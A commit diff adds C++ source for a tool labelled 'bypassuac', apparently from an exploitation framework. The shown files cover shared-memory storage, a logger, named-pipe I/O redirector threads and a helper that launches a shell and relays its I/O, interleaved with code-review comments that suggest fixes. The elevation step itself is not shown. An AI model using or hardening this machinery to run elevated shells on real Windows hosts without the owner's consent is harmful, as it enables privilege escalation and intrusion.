Add bypassuac source to the tree
git-svn-id: file:///home/svn/framework3/trunk@11484 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
c003e4b8ef
commit
5d23306f01
|
@ -0,0 +1,231 @@
|
|||
#include "stdafx.h"
|
||||
|
||||
#include "CMMN.h"
|
||||
|
||||
#include <Shlobj.h>
|
||||
|
||||
#include <sstream>
|
||||
#include <windows.h>
|
||||
#include <WinIOCtl.h>
|
||||
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
|
||||
std::wstring CError::Format( DWORD ErrorCode )
|
||||
{
|
||||
return Format( ErrorCode, NULL, NULL );
|
||||
}
|
||||
|
||||
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
|
||||
{
|
||||
LPVOID lpvMessageBuffer;
|
||||
|
||||
FormatMessage(
|
||||
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
|
||||
NULL, ErrorCode,
|
||||
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
|
||||
(LPTSTR)&lpvMessageBuffer, 0, NULL);
|
||||
|
||||
std::wstring result;
|
||||
|
||||
std::wostringstream es(TEXT(""));
|
||||
es << ErrorCode;
|
||||
|
||||
if ( Title )
|
||||
{ result.append( Title ); result.append( TEXT("\n") ); }
|
||||
else
|
||||
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
|
||||
|
||||
if ( API )
|
||||
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
|
||||
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
|
||||
if( lpvMessageBuffer )
|
||||
{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
|
||||
|
||||
if ( lpvMessageBuffer )
|
||||
{ LocalFree(lpvMessageBuffer); }
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
|
||||
CInterprocessStorage *CInterprocessStorage::Create(const TCHAR *Name, std::wstring& String)
|
||||
{
|
||||
CInterprocessStorage *storage = Create( Name );
|
||||
if ( !storage )
|
||||
return NULL;
|
||||
|
||||
storage->SetString( String );
|
||||
return storage;
|
||||
}
|
||||
|
||||
CInterprocessStorage *CInterprocessStorage::Create(const TCHAR *Name)
|
||||
{
|
||||
if ( !Name )
|
||||
return NULL;
|
||||
|
||||
HANDLE hMap = CreateFileMapping( NULL, NULL, PAGE_READWRITE, 0, MaxSize, Name );
|
||||
if ( hMap )
|
||||
{
|
||||
LPVOID view = MapViewOfFile( hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
|
||||
if ( view )
|
||||
{
|
||||
memset( view, 0, MaxSize );
|
||||
return new CInterprocessStorage( Name, hMap, view );
|
||||
}
|
||||
|
||||
CloseHandle( hMap );
|
||||
}
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
CInterprocessStorage *CInterprocessStorage::Open(const TCHAR *Name)
|
||||
{
|
||||
if ( !Name )
|
||||
return NULL;
|
||||
|
||||
HANDLE hMap = OpenFileMapping( FILE_MAP_ALL_ACCESS, TRUE, Name );
|
||||
if ( hMap )
|
||||
{
|
||||
LPVOID view = MapViewOfFile( hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
|
||||
if ( view )
|
||||
return new CInterprocessStorage( Name, hMap, view );
|
||||
|
||||
CloseHandle( hMap );
|
||||
}
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
CInterprocessStorage::CInterprocessStorage(const TCHAR *Name, HANDLE Mapping, LPVOID Base)
|
||||
: _Name(Name), _hMapping(Mapping), _pBase(Base)
|
||||
{
|
||||
}
|
||||
|
||||
std::wstring CInterprocessStorage::GetName()
|
||||
{
|
||||
return std::wstring( _Name );
|
||||
}
|
||||
|
||||
void CInterprocessStorage::GetString(std::wstring &String)
|
||||
{
|
||||
String.assign( reinterpret_cast<TCHAR *>(_pBase) );
|
||||
}
|
||||
|
||||
void CInterprocessStorage::SetString(std::wstring &String)
|
||||
{
|
||||
size_t count = min( String.size(), MaxCount - 1 );
|
||||
memcpy( _pBase, String.data(), count * sizeof(TCHAR) );
|
||||
*(reinterpret_cast<TCHAR *>(_pBase) + count) = 0;
|
||||
}
|
||||
|
||||
bool CInterprocessStorage::GetString( const TCHAR *Name, std::wstring& String )
|
||||
{
|
||||
CInterprocessStorage *storage = Open( Name );
|
||||
if ( !storage )
|
||||
return false;
|
||||
|
||||
storage->GetString( String );
|
||||
delete storage;
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
CInterprocessStorage::~CInterprocessStorage()
|
||||
{
|
||||
UnmapViewOfFile( _pBase );
|
||||
CloseHandle( _hMapping );
|
||||
}
|
||||
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
/*************************************************************************************************/
|
||||
|
||||
std::wstring CLogger::GetPath()
|
||||
{
|
||||
std::wstring path;
|
||||
|
||||
TCHAR buffer[MAX_PATH];
|
||||
if ( GetTempPath( MAX_PATH, buffer ) )
|
||||
{
|
||||
path.assign( buffer );
|
||||
path.append( TEXT("w7e.log") );
|
||||
}
|
||||
|
||||
return path;
|
||||
}
|
||||
|
||||
void CLogger::Reset()
|
||||
{
|
||||
DeleteFile( GetPath().c_str() );
|
||||
}
|
||||
|
||||
void CLogger::LogLine( std::wstring& Text )
|
||||
{
|
||||
std::wstring tmp( Text.c_str() );
|
||||
tmp.append( TEXT("\n") );
|
||||
Log( tmp );
|
||||
}
|
||||
|
||||
void CLogger::LogLine( )
|
||||
{
|
||||
Log( TEXT("\n") );
|
||||
}
|
||||
|
||||
void CLogger::LogLine( const TCHAR *Text )
|
||||
{
|
||||
if ( Text )
|
||||
LogLine( std::wstring( Text ) );
|
||||
}
|
||||
|
||||
void CLogger::Log( const TCHAR Char )
|
||||
{
|
||||
std::wstring tmp;
|
||||
tmp.append( &Char, 1 );
|
||||
Log( tmp );
|
||||
}
|
||||
|
||||
void CLogger::Log( const TCHAR *Text )
|
||||
{
|
||||
if ( Text )
|
||||
Log( std::wstring( Text ) );
|
||||
}
|
||||
|
||||
void CLogger::Log( std::wstring& Text )
|
||||
{
|
||||
TCHAR buffer[MAX_PATH];
|
||||
//
|
||||
// We have to check it every time to be reflective if user created this file
|
||||
// while program was runnig.
|
||||
//
|
||||
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
|
||||
{
|
||||
std::wstring dbg( buffer );
|
||||
dbg.append( TEXT(".debug") );
|
||||
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
|
||||
if ( INVALID_HANDLE_VALUE == hdbg )
|
||||
return;
|
||||
|
||||
CloseHandle( hdbg );
|
||||
}
|
||||
|
||||
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
|
||||
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
|
||||
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
|
||||
if( INVALID_HANDLE_VALUE != hFile )
|
||||
{
|
||||
SetFilePointer( hFile, 0, NULL, FILE_END );
|
||||
|
||||
DWORD written;
|
||||
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
|
||||
|
||||
CloseHandle( hFile );
|
||||
}
|
||||
if ( mutex ) ReleaseMutex( mutex );
|
||||
if ( mutex ) CloseHandle( mutex );
|
||||
}
|
|
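Review bot: `CInterprocessStorage::GetString` copies from the shared view with `String.assign( reinterpret_cast<TCHAR *>(_pBase) )`, which trusts a NUL terminator that any other process holding the named mapping open with `FILE_MAP_ALL_ACCESS` can overwrite, so the read is not bounded by the `MaxCount` characters the section was created for. Bounding it, e.g. `const TCHAR *p = reinterpret_cast<TCHAR *>(_pBase); String.assign( p, _tcsnlen( p, MaxCount ) );`, keeps the read inside the region `SetString` writes. Separately, in `CError::Format` the local `lpvMessageBuffer` is never initialised and the `FormatMessage` return value is ignored, so a failed lookup leaves the later `if ( lpvMessageBuffer )` tests and `LocalFree` working on an indeterminate pointer; `LPVOID lpvMessageBuffer = NULL;` fixes that.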
@ -0,0 +1,108 @@
|
|||
#pragma once
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
#include <string>
|
||||
|
||||
//
|
||||
// By Pavel
|
||||
//
|
||||
// This class is used for holding some data in the memory that can be accessed
|
||||
// from any saparate process in the system by its name.
|
||||
// It uses memeory mapped files with fixed size sections. Size is enough to hold
|
||||
// as many chars as system supports for file paths.
|
||||
//
|
||||
// Once instance was created, it can be accessed from the another progect by the name.
|
||||
// This shared object will be cleaned up when the last instance of this class will be destroyed
|
||||
// across whole system.
|
||||
//
|
||||
// Generally, it is used following:
|
||||
// 1. Create the first instance, set up data, keep it alive forever
|
||||
// 2. Access to created object by its name from another prject by creating
|
||||
// temporary instance of that object. After you dont need this object, destroy it.
|
||||
//
|
||||
|
||||
class CInterprocessStorage {
|
||||
public:
|
||||
static const size_t MaxSize = MAX_PATH;
|
||||
static const size_t MaxCount = MAX_PATH / sizeof(TCHAR);
|
||||
|
||||
//
|
||||
// Creates initial named object or opens existing, incrementing its reference count.
|
||||
// Resets all object's contents.
|
||||
//
|
||||
static CInterprocessStorage *Create( const TCHAR * Name );
|
||||
//
|
||||
// Creates initial named object or opens existing, incrementing its reference count,
|
||||
// sets its value to the specified string
|
||||
//
|
||||
static CInterprocessStorage *Create( const TCHAR * Name, std::wstring& String );
|
||||
|
||||
//
|
||||
// Opens existing named object. Does not modify its data.
|
||||
//
|
||||
static CInterprocessStorage *Open( const TCHAR * Name );
|
||||
|
||||
//
|
||||
// Queries object's name.
|
||||
//
|
||||
std::wstring GetName();
|
||||
|
||||
//
|
||||
// Queries object's value
|
||||
//
|
||||
void GetString( std::wstring& String );
|
||||
|
||||
//
|
||||
// Tries to get named object's value, accessing one by the name.
|
||||
//
|
||||
static bool GetString( const TCHAR *Name, std::wstring& String );
|
||||
|
||||
//
|
||||
// Sets object's Value
|
||||
//
|
||||
void SetString( std::wstring& String );
|
||||
|
||||
~CInterprocessStorage();
|
||||
|
||||
private:
|
||||
const HANDLE _hMapping;
|
||||
const LPVOID _pBase;
|
||||
const TCHAR *_Name;
|
||||
CInterprocessStorage( const TCHAR *Name, HANDLE Mapping, LPVOID Base );
|
||||
};
|
||||
|
||||
//
|
||||
// Logs data to file.
|
||||
// Log takes place ony if one special file exists. File is named as its hosting application
|
||||
// appended by .debug
|
||||
// Example: Code runs in the explorer.exe => log will be allowed if near the exe
|
||||
// will be placed file explorer.exe.debug
|
||||
//
|
||||
// It uses mutual execution to prevent unreadable content of the log file.
|
||||
// Log file has path = %temp%w7e.og
|
||||
//
|
||||
// FILE_FLAG_WRITE_THROUGH flag is used to prevent log to be unsaved if application crashed.
|
||||
//
|
||||
class CLogger {
|
||||
public:
|
||||
static void LogLine( std::wstring& Text );
|
||||
static void LogLine( const TCHAR *Text );
|
||||
static void LogLine( );
|
||||
static void Log( std::wstring& Text );
|
||||
static void Log( const TCHAR *Text );
|
||||
static void Log( const TCHAR Char );
|
||||
static void Reset( );
|
||||
|
||||
private:
|
||||
static std::wstring GetPath();
|
||||
};
|
||||
|
||||
//
|
||||
// Formats system error codes that were obtained by calling GetLastError.
|
||||
//
|
||||
class CError {
|
||||
public:
|
||||
static std::wstring Format( DWORD ErrorCode );
|
||||
static std::wstring Format( DWORD ErrorCode, const TCHAR *Title, const TCHAR *API );
|
||||
};
|
|
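Review bot: `MaxSize = MAX_PATH` is a byte count, so with `MaxCount = MAX_PATH / sizeof(TCHAR)` the section holds only half of `MAX_PATH` characters in a Unicode build (the TIOR project sets `CharacterSet` to Unicode). That contradicts the class comment saying the size is enough for any file path, and `SetString` in the .cpp silently truncates longer values. Deriving the size from the count, `static const size_t MaxCount = MAX_PATH;` and `static const size_t MaxSize = MaxCount * sizeof(TCHAR);`, would match the comment. The private `_Name` member also keeps the caller's raw pointer rather than a copy, so it needs either a comment stating that the name must outlive the object or a `std::wstring` member.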
@ -0,0 +1,99 @@
|
|||
#include "stdafx.h"
|
||||
|
||||
#include "CMMN.h"
|
||||
#include "Redirector.h"
|
||||
#include <windows.h>
|
||||
|
||||
const TCHAR *STDIn_PIPE = TEXT("\\\\.\\pipe\\TIOR_In");
|
||||
const TCHAR *STDOut_PIPE = TEXT("\\\\.\\pipe\\TIOR_Out");
|
||||
const TCHAR *STDErr_PIPE = TEXT("\\\\.\\pipe\\TIOR_Err");
|
||||
|
||||
DWORD WINAPI Redirector( LPVOID Parameter )
|
||||
{
|
||||
assert( Parameter );
|
||||
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
|
||||
|
||||
CLogger::Log( TEXT("Hello redirector thread: ") );
|
||||
CLogger::LogLine( pair->Name );
|
||||
|
||||
CHAR read_buff[2];
|
||||
DWORD nBytesRead,nBytesWrote;
|
||||
|
||||
bool was_0d = false;
|
||||
bool error = false;
|
||||
while ( ! error )
|
||||
{
|
||||
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
|
||||
{
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
pair->Name.c_str(),
|
||||
TEXT("ReadFile") ) );
|
||||
error = true && (!pair->KeepAlive);
|
||||
break;
|
||||
}
|
||||
|
||||
if ( pair->Linux )
|
||||
{
|
||||
if ( ! was_0d )
|
||||
{
|
||||
if ( read_buff[0] == 0xa )
|
||||
{
|
||||
read_buff[0] = 0xd;
|
||||
read_buff[1] = 0xa;
|
||||
nBytesRead = 2;
|
||||
}
|
||||
}
|
||||
was_0d = read_buff[nBytesRead - 1] == 0x0d;
|
||||
}
|
||||
|
||||
for ( DWORD i = 0; i < nBytesRead; i++ )
|
||||
{
|
||||
if ( pair->DestinationConsole )
|
||||
{
|
||||
//
|
||||
// Emulate console input.
|
||||
//
|
||||
|
||||
INPUT_RECORD inp = {0};
|
||||
inp.EventType = KEY_EVENT;
|
||||
inp.Event.KeyEvent.uChar.AsciiChar = read_buff[i];
|
||||
inp.Event.KeyEvent.wRepeatCount = 1;
|
||||
inp.Event.KeyEvent.wVirtualKeyCode = 0;
|
||||
inp.Event.KeyEvent.wVirtualScanCode = 0;
|
||||
inp.Event.KeyEvent.bKeyDown = TRUE;
|
||||
inp.Event.KeyEvent.dwControlKeyState = 0;
|
||||
|
||||
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
|
||||
{
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
pair->Name.c_str(),
|
||||
TEXT("WriteConsoleInput") ) );
|
||||
error = true && (!pair->KeepAlive);
|
||||
break;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
|
||||
{
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
pair->Name.c_str(),
|
||||
TEXT("WriteFile") ) );
|
||||
error = true && (!pair->KeepAlive);
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
CLogger::Log( TEXT("Bye redirector thread: ") );
|
||||
CLogger::LogLine( pair->Name );
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
|
|
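Review bot: In the `pair->Linux` branch, `read_buff[nBytesRead - 1]` indexes far outside the two-byte buffer when `ReadFile` succeeds with `nBytesRead == 0` (a zero-length write on a pipe, or end of file), because the `DWORD` subtraction wraps. A guard right after the `ReadFile` check, such as `if ( nBytesRead == 0 ) continue;` (or `break;` if a zero-byte read should end the thread), avoids it. Also, the `ReadFile` failure path always executes `break`, which leaves the `while` loop, so `KeepAlive` only has an effect on the two write-failure paths, whose `break` leaves just the inner `for`. That differs from the "prevent thread's exit on any IO error" comment in Redirector.h.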
@ -0,0 +1,44 @@
|
|||
#pragma once
|
||||
|
||||
#include <stdio.h>
|
||||
#include <tchar.h>
|
||||
|
||||
#include <string>
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
//
|
||||
// By Pavel
|
||||
|
||||
//
|
||||
// Defines names of pipes that can be accessed by name for redirecting IO.
|
||||
//
|
||||
const extern TCHAR *STDIn_PIPE;
|
||||
const extern TCHAR *STDOut_PIPE;
|
||||
const extern TCHAR *STDErr_PIPE;
|
||||
|
||||
//
|
||||
// Structure that is passed to newly created thread.
|
||||
// Defines how to redirect IO
|
||||
//
|
||||
typedef struct _TRedirectorPair {
|
||||
HANDLE Source;
|
||||
HANDLE Destination;
|
||||
//
|
||||
// Uses directly Console IO instead of ReadFile and WriteFile
|
||||
//
|
||||
bool DestinationConsole;
|
||||
HANDLE Thread;
|
||||
//
|
||||
// If true, prevent thread's exit on any IO error.
|
||||
//
|
||||
bool KeepAlive;
|
||||
std::wstring Name;
|
||||
//
|
||||
// Appends 0x0A which is the one line terminator for linux with 0x0D. ( \r \n escapes)
|
||||
//
|
||||
bool Linux;
|
||||
}TRedirectorPair;
|
||||
|
||||
DWORD WINAPI Redirector( LPVOID Parameter );
|
||||
|
|
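Review bot: The comment on `Linux` describes the translation ambiguously; what `Redirector` does is replace a bare 0x0A with the pair 0x0D 0x0A unless the previous byte was already 0x0D. I would reword it to `// Converts a lone LF (0x0A) from the source into CR LF (0x0D 0x0A).`. The three pipe-name declarations are written `const extern TCHAR *`, which makes the characters const but leaves the pointers themselves assignable; `extern const TCHAR * const STDIn_PIPE;` (with matching definitions in Redirector.cpp) would state the intent.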
@ -0,0 +1,147 @@
|
|||
#include "stdafx.h"
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
#include ".\..\Redirector.h"
|
||||
#include ".\..\CMMN.h"
|
||||
|
||||
//
|
||||
// By Pavels
|
||||
//
|
||||
// This application is used for redirection data from the console to the pipes,
|
||||
// not useng pipes at the other side.
|
||||
// It is caused by some differences when using some other proceses which
|
||||
// also redirect data. Main reason is differences in ReadConsole and ReadFile
|
||||
// methods.
|
||||
// Using this redirector app, child process will never know that his parent redirects it's IO.
|
||||
//
|
||||
// Everything is asynchronous. 3 Threads.
|
||||
//
|
||||
|
||||
int _tmain(int argc, _TCHAR* argv[])
|
||||
{
|
||||
CLogger::LogLine(TEXT("TIOR: Hello"));
|
||||
|
||||
TRedirectorPair in = {0};
|
||||
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
//in.KeepAlive = true;
|
||||
in.Name.assign(TEXT("TIOR: [in]"));
|
||||
if ( INVALID_HANDLE_VALUE != in.Source )
|
||||
{
|
||||
in.Destination = GetStdHandle( STD_INPUT_HANDLE );
|
||||
in.DestinationConsole = true;
|
||||
if ( INVALID_HANDLE_VALUE != in.Destination )
|
||||
in.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&in, 0, NULL);
|
||||
}
|
||||
|
||||
TRedirectorPair out = {0};
|
||||
out.Destination = CreateFile( STDOut_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
out.KeepAlive = true;
|
||||
out.Name.assign(TEXT("TIOR: [out]"));
|
||||
if ( INVALID_HANDLE_VALUE != out.Destination )
|
||||
{
|
||||
SECURITY_ATTRIBUTES sa;
|
||||
sa.nLength= sizeof(SECURITY_ATTRIBUTES);
|
||||
sa.lpSecurityDescriptor = NULL;
|
||||
sa.bInheritHandle = TRUE;
|
||||
|
||||
HANDLE tmp;
|
||||
CreatePipe(&out.Source,&tmp,&sa,0);
|
||||
SetStdHandle( STD_OUTPUT_HANDLE, tmp );
|
||||
out.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&out, 0, NULL);
|
||||
}
|
||||
|
||||
TRedirectorPair err = {0};
|
||||
err.Destination = CreateFile( STDErr_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
err.KeepAlive = true;
|
||||
err.Name.assign(TEXT("TIOR: [err]"));
|
||||
if ( INVALID_HANDLE_VALUE != err.Destination )
|
||||
{
|
||||
SECURITY_ATTRIBUTES sa;
|
||||
sa.nLength= sizeof(SECURITY_ATTRIBUTES);
|
||||
sa.lpSecurityDescriptor = NULL;
|
||||
sa.bInheritHandle = TRUE;
|
||||
|
||||
HANDLE tmp;
|
||||
CreatePipe(&err.Source,&tmp,&sa,0);
|
||||
SetStdHandle( STD_ERROR_HANDLE, tmp );
|
||||
err.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&err, 0, NULL);
|
||||
}
|
||||
|
||||
///////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
//
|
||||
// Obtainig information about process to start and redirect
|
||||
//
|
||||
|
||||
std::wstring shell, args, dir;
|
||||
CInterprocessStorage::GetString( TEXT("w7e_TIORShell"), shell );
|
||||
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
|
||||
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
|
||||
|
||||
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
|
||||
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
|
||||
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
|
||||
|
||||
STARTUPINFO si = {0};si.cb = sizeof(si);
|
||||
PROCESS_INFORMATION pi = {0};
|
||||
|
||||
BOOL created = CreateProcess(
|
||||
shell.c_str(),
|
||||
const_cast<TCHAR *>(args.c_str()),
|
||||
NULL,
|
||||
NULL,
|
||||
TRUE,
|
||||
0,
|
||||
NULL,
|
||||
dir.c_str(),
|
||||
&si,
|
||||
&pi );
|
||||
|
||||
if ( ! created )
|
||||
{
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
TEXT("TIOR: Unable to create child process"),
|
||||
TEXT("CreateProcess")));
|
||||
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
else
|
||||
{
|
||||
CloseHandle( pi.hThread );
|
||||
}
|
||||
|
||||
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
|
||||
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
|
||||
//
|
||||
// Waiting for eny handle to be freed.
|
||||
// Either some IO thread will die or process will be oevered.
|
||||
//
|
||||
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
|
||||
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
|
||||
|
||||
//
|
||||
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
|
||||
// Thats why we wait again for some period of time reading died process's output untill the end.
|
||||
//
|
||||
WaitForMultipleObjects( 3, waiters + 1, FALSE, 1000 );
|
||||
|
||||
//
|
||||
// Dont forget to close child process. We need to be sure, if user terminated app which
|
||||
// reads our redirected data, we terminate the target child app.
|
||||
//
|
||||
CLogger::LogLine(TEXT("TIOR: Killing child process"));
|
||||
TerminateProcess( pi.hProcess, EXIT_FAILURE );
|
||||
CloseHandle( pi.hProcess );
|
||||
|
||||
CLogger::LogLine(TEXT("TIOR: Exit"));
|
||||
|
||||
//
|
||||
// I will not close any handles here - system will terminate and close all by it self.
|
||||
//
|
||||
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
|
|
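Review bot: `waiters` is filled with `in.Thread`, `out.Thread` and `err.Thread` even when the corresponding pipe could not be opened and the field is still the zero from `= {0}`, or when `CreateThread` returned NULL. `WaitForMultipleObjects` fails immediately when the array contains an invalid handle, so both waits would fall through and the child would be terminated right after it starts. The wait should be built only from the handles that actually exist, as sketched below. The results of `CreatePipe` and of the three `CInterprocessStorage::GetString` calls are ignored as well, and `const_cast<TCHAR *>(args.c_str())` hands `CreateProcess` a command-line buffer it is documented to be allowed to modify, so a writable copy is safer.

```cpp
HANDLE waiters[4] = { pi.hProcess };
DWORD count = 1;
if ( in.Thread )  waiters[count++] = in.Thread;
if ( out.Thread ) waiters[count++] = out.Thread;
if ( err.Thread ) waiters[count++] = err.Thread;

WaitForMultipleObjects( count, waiters, FALSE, INFINITE );
// … unchanged: "Ensure that we processed all data in pipes" log line and comment …
if ( count > 1 )
    WaitForMultipleObjects( count - 1, waiters + 1, FALSE, 1000 );
```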
@ -0,0 +1,175 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{B36517F4-984C-422C-ADF9-85D5ACD4E30B}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>TIOR</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
